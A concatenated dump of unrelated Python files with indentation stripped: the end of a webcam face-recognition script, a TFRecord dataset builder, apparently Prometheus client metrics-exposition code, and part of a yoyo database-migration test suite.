self.db.add_person(largeNewName, largeNewName + str(ct + 1))
except:
pass
else:
detected = True
else:
name = name_list[matchingFace]
if(len(age_list) > 0):
age = age_list[matchingFace]
gender = gender_list[matchingFace]
glass = glass_list[matchingFace]
detected = False
face_names.append(name)
face_ages.append(age)
face_gender.append(gender)
face_glasses.append(glass)
process_this_frame = not process_this_frame
k = 0
# Display the results
for (top, right, bottom, left), name1 in zip(face_locations, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 4
right *= 4
bottom *= 4
left *= 4
age1 = face_ages[k]
gender1 = face_gender[k]
glass1 = face_glasses[k]
k = k + 1
# Draw a box around the face
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# # Draw a label with a name below the face
cv2.rectangle(frame, (left, bottom - 35), (right, bottom + 40), (0, 0, 255), 2)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name1, (left + 6, bottom - 6), font, 1, (0, 255, 0), 1)
cv2.putText(frame, str(age1), (left + 6, bottom + 16), font, 0.4, (0, 255, 0), 1)
cv2.putText(frame, gender1, (left + 6, bottom + 27), font, 0.4, (0, 255, 0), 1)
cv2.putText(frame, glass1, (left + 6, bottom + 38), font, 0.4, (0, 255, 0), 1)
# Display the resulting image
# cv2.putText(frame,"What's your name?",(320,240),cv2.FONT_HERSHEY_DUPLEX,1,(0, 255, 0), 1)
cv2.imshow('Video', frame)
cv2.imwrite("static/Stream.jpg", frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
if __name__ == "__main__" :
r = face_reco()
# # r.start()
r.reco()
# Release handle to the webcam
# r = face_reco()
# # r.start()
# r.reco()
# video_capture.release()
# cv2.destroyAllWindows()
|
create_tfrecords.py
|
"""
Create the tfrecord files for a dataset.
This script is taken from the Visipedia repo: https://github.com/visipedia/tfrecords
A lot of this code comes from the tensorflow inception example, so here is their license:
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
import argparse
from datetime import datetime
import hashlib
import json
import os
from queue import Queue
import random
import sys
import threading
import numpy as np
import tensorflow as tf
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
def _validate_text(text):
"""If text is not str or unicode, then try to convert it to str."""
if isinstance(text, str):
return text.encode()
else:
return str(text).encode()
def _str_and_encode(value):
return str(value).encode()
def _convert_to_example(image_example, image_buffer, height, width, colorspace='RGB',
channels=3, image_format='JPEG'):
"""Build an Example proto for an example.
Args:
image_example: dict, an image example
image_buffer: string, JPEG encoding of RGB image
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
# Required
filename = str(image_example['filename']).encode() # default encoding='utf-8'
image_id = str(image_example['id']).encode()
# Class label for the whole image
image_class = image_example.get('class', {})
class_label = image_class.get('label', 0)
class_text = _validate_text(image_class.get('text', ''))
class_conf = image_class.get('conf', 1.)
# Objects
image_objects = image_example.get('object', {})
object_count = image_objects.get('count', 0)
# Bounding Boxes
image_bboxes = image_objects.get('bbox', {})
xmin = image_bboxes.get('xmin', [])
xmax = image_bboxes.get('xmax', [])
ymin = image_bboxes.get('ymin', [])
ymax = image_bboxes.get('ymax', [])
bbox_scores = image_bboxes.get('score', [])
bbox_labels = image_bboxes.get('label', [])
bbox_text = list(map(_validate_text, image_bboxes.get('text', [])))
bbox_label_confs = image_bboxes.get('conf', [])
# Parts
image_parts = image_objects.get('parts', {})
parts_x = image_parts.get('x', [])
parts_y = image_parts.get('y', [])
parts_v = image_parts.get('v', [])
parts_s = image_parts.get('score', [])
# Areas
object_areas = image_objects.get('area', [])
# Ids
object_ids = list(map(_str_and_encode, image_objects.get('id', [])))
# Any extra data (e.g. stringified json)
extra_info = str(image_class.get('extra', '')).encode()
# Additional fields for the format needed by the Object Detection repository
key = hashlib.sha256(image_buffer).hexdigest().encode()
is_crowd = image_objects.get('is_crowd', [])
# For explanation of the fields, see https://github.com/visipedia/tfrecords
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace.encode()),
'image/channels': _int64_feature(channels),
'image/format': _bytes_feature(image_format.encode()),
'image/filename': _bytes_feature(filename),
'image/id': _bytes_feature(image_id),
'image/encoded': _bytes_feature(image_buffer),
'image/extra': _bytes_feature(extra_info),
'image/class/label': _int64_feature(class_label),
'image/class/text': _bytes_feature(class_text),
'image/class/conf': _float_feature(class_conf),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature(bbox_labels),
'image/object/bbox/text': _bytes_feature(bbox_text),
'image/object/bbox/conf': _float_feature(bbox_label_confs),
'image/object/bbox/score' : _float_feature(bbox_scores),
'image/object/parts/x' : _float_feature(parts_x),
'image/object/parts/y' : _float_feature(parts_y),
'image/object/parts/v' : _int64_feature(parts_v),
'image/object/parts/score' : _float_feature(parts_s),
'image/object/count' : _int64_feature(object_count),
'image/object/area' : _float_feature(object_areas),
'image/object/id' : _bytes_feature(object_ids),
# Additional fields for the format needed by the Object Detection repository
'image/source_id': _bytes_feature(image_id),
'image/key/sha256': _bytes_feature(key),
'image/object/class/label': _int64_feature(bbox_labels),
'image/object/class/text': _bytes_feature(bbox_text),
'image/object/is_crowd': _int64_feature(is_crowd)
}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
# Convert the image data from png to jpg
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
# Decode the image data as a jpeg image
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3, "JPEG needs to have height x width x channels"
assert image.shape[2] == 3, "JPEG needs to have 3 channels (RGB)"
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
_, file_extension = os.path.splitext(filename)
return file_extension.lower() == '.png'
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read() # changed to 'rb' per https://github.com/tensorflow/tensorflow/issues/11312
# Clean the dirty data.
if _is_png(filename):
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, output_directory,
dataset, num_shards, store_images, error_queue):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set (e.g. `train` or `test`)
output_directory: string, file path to store the tfrecord files.
dataset: list, a list of image example dicts
num_shards: integer number of shards for this data set.
store_images: bool, should the image be stored in the tfrecord
error_queue: Queue, a queue to place image examples that failed.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
error_counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
image_example = dataset[i]
filename = str(image_example['filename'])
try:
if store_images:
if 'encoded' in image_example:
image_buffer = image_example['encoded']
height = image_example['height']
width = image_example['width']
colorspace = image_example['colorspace']
image_format = image_example['format']
num_channels = image_example['channels']
example = _convert_to_example(image_example, image_buffer, height,
width, colorspace, num_channels,
image_format)
else:
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(image_example, image_buffer, height,
width)
else:
image_buffer=''
height = int(image_example['height'])
width = int(image_example['width'])
example = _convert_to_example(image_example, image_buffer, height,
width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
except Exception as e:
#raise
print('Exception in making example for {}.'.format(i))
print('Filename: {}'.format(filename))
error_counter += 1
error_msg = repr(e)
image_example['error_msg'] = error_msg
error_queue.put(image_example)
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s, with %d errors.' %
(datetime.now(), thread_index, shard_counter, output_file, error_counter))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards, with %d errors.' %
(datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
sys.stdout.flush()
def create(dataset, dataset_name, output_directory, num_shards, num_threads, shuffle=True, store_images=True):
"""Create the tfrecord files to be used to train or test a model.
Args:
dataset : [{
"filename" : <REQUIRED: path to the image file>,
"id" : <REQUIRED: id of the image>,
"class" : {
"label" : <[0, num_classes)>,
"text" : <text description of class>
},
"object" : {
"bbox" : {
"xmin" : [],
"xmax" : [],
"ymin" : [],
"ymax" : [],
"label" : []
}
}
}]
dataset_name: a name for the dataset
output_directory: path to a directory to write the tfrecord files
num_shards: the number of tfrecord files to create
num_threads: the number of threads to use
shuffle : bool, should the image examples be shuffled or not prior to creating the tfrecords.
Returns:
list : a list of image examples that failed to process.
"""
# Images in the tfrecords set must be shuffled properly
if shuffle:
random.shuffle(dataset)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(dataset), num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
# A Queue to hold the image examples that fail to process.
error_queue = Queue()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, dataset_name, output_directory, dataset,
num_shards, store_images, error_queue)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(dataset)))
# Collect the errors
errors = []
while not error_queue.empty():
errors.append(error_queue.get())
print('%d examples failed.' % (len(errors),))
return errors
def parse_args():
parser = argparse.ArgumentParser(description='Basic statistics on tfrecord files')
parser.add_argument('--dataset_path', dest='dataset_path',
help='Path to the dataset json file.', type=str,
required=True)
parser.add_argument('--prefix', dest='dataset_name',
help='Prefix for the tfrecords (e.g. `train`, `test`, `val`).', type=str,
required=True)
parser.add_argument('--output_dir', dest='output_dir',
help='Directory for the tfrecords.', type=str,
required=True)
parser.add_argument('--shards', dest='num_shards',
help='Number of shards to make.', type=int,
required=True)
parser.add_argument('--threads', dest='num_threads',
help='Number of threads to make.', type=int,
required=True)
parser.add_argument('--shuffle', dest='shuffle',
help='Shuffle the records before saving them.',
required=False, action='store_true', default=False)
parser.add_argument('--store_images', dest='store_images',
help='Store the images in the tfrecords.',
required=False, action='store_true', default=False)
parsed_args = parser.parse_args()
return parsed_args
def main():
args = parse_args()
with open(args.dataset_path) as f:
dataset = json.load(f)
errors = create(
dataset=dataset,
dataset_name=args.dataset_name,
output_directory=args.output_dir,
num_shards=args.num_shards,
num_threads=args.num_threads,
shuffle=args.shuffle,
store_images=args.store_images
)
return errors
if __name__ == '__main__':
main()
|
exposition.py
|
import base64
from contextlib import closing
from http.server import BaseHTTPRequestHandler
import os
import socket
from socketserver import ThreadingMixIn
import sys
import threading
from urllib.error import HTTPError
from urllib.parse import parse_qs, quote_plus, urlparse
from urllib.request import (
build_opener, HTTPHandler, HTTPRedirectHandler, Request,
)
from wsgiref.simple_server import make_server, WSGIRequestHandler, WSGIServer
from .openmetrics import exposition as openmetrics
from .registry import REGISTRY
from .utils import floatToGoString
__all__ = (
'CONTENT_TYPE_LATEST',
'delete_from_gateway',
'generate_latest',
'instance_ip_grouping_key',
'make_asgi_app',
'make_wsgi_app',
'MetricsHandler',
'push_to_gateway',
'pushadd_to_gateway',
'start_http_server',
'start_wsgi_server',
'write_to_textfile',
)
CONTENT_TYPE_LATEST = 'text/plain; version=0.0.4; charset=utf-8'
"""Content type of the latest text format"""
PYTHON376_OR_NEWER = sys.version_info > (3, 7, 5)
class _PrometheusRedirectHandler(HTTPRedirectHandler):
"""
Allow additional methods (e.g. PUT) and data forwarding in redirects.
Use of this class constitute a user's explicit agreement to the
redirect responses the Prometheus client will receive when using it.
You should only use this class if you control or otherwise trust the
redirect behavior involved and are certain it is safe to full transfer
the original request (method and data) to the redirected URL. For
example, if you know there is a cosmetic URL redirect in front of a
local deployment of a Prometheus server, and all redirects are safe,
this is the class to use to handle redirects in that case.
The standard HTTPRedirectHandler does not forward request data nor
does it allow redirected PUT requests (which Prometheus uses for some
operations, for example `push_to_gateway`) because these cannot
generically guarantee no violations of HTTP RFC 2616 requirements for
the user to explicitly confirm redirects that could have unexpected
side effects (such as rendering a PUT request non-idempotent or
creating multiple resources not named in the original request).
"""
def redirect_request(self, req, fp, code, msg, headers, newurl):
"""
Apply redirect logic to a request.
See parent HTTPRedirectHandler.redirect_request for parameter info.
If the redirect is disallowed, this raises the corresponding HTTP error.
If the redirect can't be determined, return None to allow other handlers
to try. If the redirect is allowed, return the new request.
This method specialized for the case when (a) the user knows that the
redirect will not cause unacceptable side effects for any request method,
and (b) the user knows that any request data should be passed through to
the redirect. If either condition is not met, this should not be used.
"""
# note that requests being provided by a handler will use get_method to
# indicate the method, by monkeypatching this, instead of setting the
# Request object's method attribute.
m = getattr(req, "method", req.get_method())
if not (code in (301, 302, 303, 307) and m in ("GET", "HEAD")
or code in (301, 302, 303) and m in ("POST", "PUT")):
raise HTTPError(req.full_url, code, msg, headers, fp)
new_request = Request(
newurl.replace(' ', '%20'), # space escaping in new url if needed.
headers=req.headers,
origin_req_host=req.origin_req_host,
unverifiable=True,
data=req.data,
)
new_request.method = m
return new_request
def _bake_output(registry, accept_header, params):
"""Bake output for metrics output."""
encoder, content_type = choose_encoder(accept_header)
if 'name[]' in params:
registry = registry.restricted_registry(params['name[]'])
output = encoder(registry)
return '200 OK', ('Content-Type', content_type), output
def make_wsgi_app(registry=REGISTRY):
"""Create a WSGI app which serves the metrics from a registry."""
def prometheus_app(environ, start_response):
# Prepare parameters
accept_header = environ.get('HTTP_ACCEPT')
params = parse_qs(environ.get('QUERY_STRING', ''))
if environ['PATH_INFO'] == '/favicon.ico':
# Serve empty response for browsers
status = '200 OK'
header = ('', '')
output = b''
else:
# Bake output
status, header, output = _bake_output(registry, accept_header, params)
# Return output
start_response(status, [header])
return [output]
return prometheus_app
class _SilentHandler(WSGIRequestHandler):
"""WSGI handler that does not log requests."""
def log_message(self, format, *args):
"""Log nothing."""
class ThreadingWSGIServer(ThreadingMixIn, WSGIServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
daemon_threads = True
def start_wsgi_server(port, addr='', registry=REGISTRY):
"""Starts a WSGI server for prometheus metrics as a daemon thread."""
app = make_wsgi_app(registry)
httpd = make_server(addr, port, app, ThreadingWSGIServer, handler_class=_SilentHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
start_http_server = start_wsgi_server
def generate_latest(registry=REGISTRY):
"""Returns the metrics from the registry in latest text format as a string."""
def sample_line(line):
if line.labels:
labelstr = '{{{0}}}'.format(','.join(
['{}="{}"'.format(
k, v.replace('\\', r'\\').replace('\n', r'\n').replace('"', r'\"'))
for k, v in sorted(line.labels.items())]))
else:
labelstr = ''
timestamp = ''
if line.timestamp is not None:
# Convert to milliseconds.
timestamp = f' {int(float(line.timestamp) * 1000):d}'
return f'{line.name}{labelstr} {floatToGoString(line.value)}{timestamp}\n'
output = []
for metric in registry.collect():
try:
mname = metric.name
mtype = metric.type
# Munging from OpenMetrics into Prometheus format.
if mtype == 'counter':
mname = mname + '_total'
elif mtype == 'info':
mname = mname + '_info'
mtype = 'gauge'
elif mtype == 'stateset':
mtype = 'gauge'
elif mtype == 'gaugehistogram':
# A gauge histogram is really a gauge,
# but this captures the structure better.
mtype = 'histogram'
elif mtype == 'unknown':
mtype = 'untyped'
output.append('# HELP {} {}\n'.format(
mname, metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {mname} {mtype}\n')
om_samples = {}
for s in metric.samples:
for suffix in ['_created', '_gsum', '_gcount']:
if s.name == metric.name + suffix:
# OpenMetrics specific sample, put in a gauge at the end.
om_samples.setdefault(suffix, []).append(sample_line(s))
break
else:
output.append(sample_line(s))
except Exception as exception:
exception.args = (exception.args or ('',)) + (metric,)
raise
for suffix, lines in sorted(om_samples.items()):
output.append('# HELP {}{} {}\n'.format(metric.name, suffix,
metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {metric.name}{suffix} gauge\n')
output.extend(lines)
return ''.join(output).encode('utf-8')
def choose_encoder(accept_header):
accept_header = accept_header or ''
for accepted in accept_header.split(','):
if accepted.split(';')[0].strip() == 'application/openmetrics-text':
return (openmetrics.generate_latest,
openmetrics.CONTENT_TYPE_LATEST)
return generate_latest, CONTENT_TYPE_LATEST
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``REGISTRY``."""
registry = REGISTRY
def do_GET(self):
# Prepare parameters
registry = self.registry
accept_header = self.headers.get('Accept')
params = parse_qs(urlparse(self.path).query)
# Bake output
status, header, output = _bake_output(registry, accept_header, params)
# Return output
self.send_response(int(status.split(' ')[0]))
self.send_header(*header)
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@classmethod
def factory(cls, registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str(cls.__name__)
MyMetricsHandler = type(cls_name, (cls, object),
{"registry": registry})
return MyMetricsHandler
def write_to_textfile(path, registry):
"""Write metrics to the given path.
This is intended for use with the Node exporter textfile collector.
The path must end in .prom for the textfile collector to process it."""
tmppath = f'{path}.{os.getpid()}.{threading.current_thread().ident}'
with open(tmppath, 'wb') as f:
f.write(generate_latest(registry))
# rename(2) is atomic but fails on Windows if the destination file exists
if os.name == 'nt':
os.replace(tmppath, path)
else:
os.rename(tmppath, path)
def _make_handler(url, method, timeout, headers, data, base_handler):
def handle():
request = Request(url, data=data)
request.get_method = lambda: method
for k, v in headers:
request.add_header(k, v)
resp = build_opener(base_handler).open(request, timeout=timeout)
if resp.code >= 400:
raise OSError(f"error talking to pushgateway: {resp.code} {resp.msg}")
return handle
def default_handler(url, method, timeout, headers, data):
"""Default handler that implements HTTP/HTTPS connections.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
return _make_handler(url, method, timeout, headers, data, HTTPHandler)
def passthrough_redirect_handler(url, method, timeout, headers, data):
"""
Handler that automatically trusts redirect responses for all HTTP methods.
Augments standard HTTPRedirectHandler capability by permitting PUT requests,
preserving the method upon redirect, and passing through all headers and
data from the original request. Only use this handler if you control or
trust the source of redirect responses you encounter when making requests
via the Prometheus client. This handler will simply repeat the identical
request, including same method and data, to the new redirect URL."""
return _make_handler(url, method, timeout, headers, data, _PrometheusRedirectHandler)
def basic_auth_handler(url, method, timeout, headers, data, username=None, password=None):
"""Handler that implements HTTP/HTTPS connections with Basic Auth.
Sets auth headers using supplied 'username' and 'password', if set.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
def handle():
"""Handler that implements HTTP Basic Auth.
"""
if username is not None and password is not None:
auth_value = f'{username}:{password}'.encode()
auth_token = base64.b64encode(auth_value)
auth_header = b'Basic ' + auth_token
headers.append(['Authorization', auth_header])
default_handler(url, method, timeout, headers, data)()
return handle
def push_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""Push metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
If not None, the argument must be a function which accepts
the following arguments:
url, method, timeout, headers, and content
May be used to implement additional functionality not
supported by the built-in default handler (such as SSL
client certicates, and HTTP authentication mechanisms).
'url' is the URL for the request, the 'gateway' argument
described earlier will form the basis of this URL.
'method' is the HTTP method which should be used when
carrying out the request.
'timeout' requests not successfully completed after this
many seconds should be aborted. If timeout is None, then
the handler should not set a timeout.
'headers' is a list of ("header-name","header-value") tuples
which must be passed to the pushgateway in the form of HTTP
request headers.
The function should raise an exception (e.g. IOError) on
failure.
'content' is the data which should be used to form the HTTP
Message Body.
This overwrites all metrics with the same job and grouping_key.
This uses the PUT HTTP method."""
_use_gateway('PUT', gateway, job, registry, grouping_key, timeout, handler)
def pushadd_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""PushAdd metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This replaces metrics with the same name, job and grouping_key.
This uses the POST HTTP method."""
_use_gateway('POST', gateway, job, registry, grouping_key, timeout, handler)
def delete_from_gateway(
gateway, job, grouping_key=None, timeout=30, handler=default_handler):
"""Delete metrics from the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long delete will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This deletes metrics with the given job and grouping_key.
This uses the DELETE HTTP method."""
_use_gateway('DELETE', gateway, job, None, grouping_key, timeout, handler)
def _use_gateway(method, gateway, job, registry, grouping_key, timeout, handler):
gateway_url = urlparse(gateway)
# See https://bugs.python.org/issue27657 for details on urlparse in py>=3.7.6.
if not gateway_url.scheme or (
PYTHON376_OR_NEWER
and gateway_url.scheme not in ['http', 'https']
):
gateway = f'http://{gateway}'
gateway = gateway.rstrip('/')
url = '{}/metrics/{}/{}'.format(gateway, *_escape_grouping_key("job", job))
data = b''
if method != 'DELETE':
data = generate_latest(registry)
if grouping_key is None:
grouping_key = {}
url += ''.join(
'/{}/{}'.format(*_escape_grouping_key(str(k), str(v)))
for k, v in sorted(grouping_key.items()))
handler(
url=url, method=method, timeout=timeout,
headers=[('Content-Type', CONTENT_TYPE_LATEST)], data=data,
)()
def _escape_grouping_key(k, v):
if v == "":
# Per https://github.com/prometheus/pushgateway/pull/346.
return k + "@base64", "="
elif '/' in v:
# Added in Pushgateway 0.9.0.
return k + "@base64", base64.urlsafe_b64encode(v.encode("utf-8")).decode("utf-8")
else:
return k, quote_plus(v)
def instance_ip_grouping_key():
"""Grouping key with instance set to the IP Address of this host."""
with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
if sys.platform == 'darwin':
# This check is done this way only on MacOS devices
# it is done this way because the localhost method does
# not work.
# This method was adapted from this StackOverflow answer:
# https://stackoverflow.com/a/28950776
s.connect(('10.255.255.255', 1))
else:
s.connect(('localhost', 0))
return {'instance': s.getsockname()[0]}
from .asgi import make_asgi_app # noqa
|
test_backends.py
|
from functools import partial
from tempfile import NamedTemporaryFile
from threading import Thread
import time
from mock import Mock
from mock import call
from mock import patch
import pytest
from yoyo import backends
from yoyo import read_migrations
from yoyo import exceptions
from yoyo.connections import get_backend
from tests import get_test_backends
from tests import get_test_dburis
from tests import with_migrations
class TestTransactionHandling(object):
def test_it_commits(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == [("A",)]
def test_it_rolls_back(self, backend):
with pytest.raises(backend.DatabaseError):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
# Invalid SQL to produce an error
backend.execute("INSERT INTO nonexistant values ('A')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == []
def test_it_nests_transactions(self, backend):
with backend.transaction():
backend.execute("INSERT INTO yoyo_t values ('A')")
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('B')")
trans.rollback()
with backend.transaction() as trans:
backend.execute("INSERT INTO yoyo_t values ('C')")
with backend.transaction():
rows = list(backend.execute("SELECT * FROM yoyo_t").fetchall())
assert rows == [("A",), ("C",)]
def test_backend_detects_transactional_ddl(self, backend):
expected = {
backends.PostgresqlBackend: True,
backends.SQLiteBackend: True,
backends.MySQLBackend: False,
}
if backend.__class__ in expected:
assert backend.has_transactional_ddl is expected[backend.__class__]
def test_non_transactional_ddl_behaviour(self, backend):
"""
DDL queries in MySQL commit the current transaction,
but it still seems to respect a subsequent rollback.
We don't rely on this behaviour, but it's weird and worth having
a test to document how it works and flag up in future should a new
backend do things differently
"""
if backend.has_transactional_ddl:
return
with backend.transaction() as trans:
backend.execute("CREATE TABLE yoyo_a (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_a VALUES (1)")
backend.execute("CREATE TABLE yoyo_b (id INT)") # implicit commit
backend.execute("INSERT INTO yoyo_b VALUES (1)")
trans.rollback()
count_a = backend.execute("SELECT COUNT(1) FROM yoyo_a").fetchall()[0][0]
assert count_a == 1
count_b = backend.execute("SELECT COUNT(1) FROM yoyo_b").fetchall()[0][0]
assert count_b == 0
@with_migrations(
a="""
__transactional__ = False
step('CREATE DATABASE yoyo_test_tmp',
'DROP DATABASE yoyo_test_tmp',
)
"""
)
def test_statements_requiring_no_transaction(self, tmpdir):
"""
PostgreSQL will error if certain statements (eg CREATE DATABASE)
are run within a transaction block.
As far as I know this behavior is PostgreSQL specific. We can't run
this test in sqlite or oracle as they do not support CREATE DATABASE.
"""
for backend in get_test_backends(exclude={"sqlite", "oracle"}):
migrations = read_migrations(tmpdir)
backend.apply_migrations(migrations)
backend.rollback_migrations(migrations)
@with_migrations(
a="""
__transactional__ = False
def reopen_db(conn):
import sqlite3
for _, db, filename in conn.execute('PRAGMA database_list'):
if db == 'main':
reconn = sqlite3.connect(filename)
reconn.execute("CREATE TABLE yoyo_test_b (id int)")
break
else:
raise AssertionError("sqlite main database not found")
step('CREATE TABLE yoyo_test_a (id int)')
step(reopen_db)
step('CREATE TABLE yoyo_test_c (id int)')
"""
)
def test_disabling_transactions_in_sqlite(self, tmpdir):
"""
Transactions cause sqlite databases to become locked, preventing
other tools from accessing them:
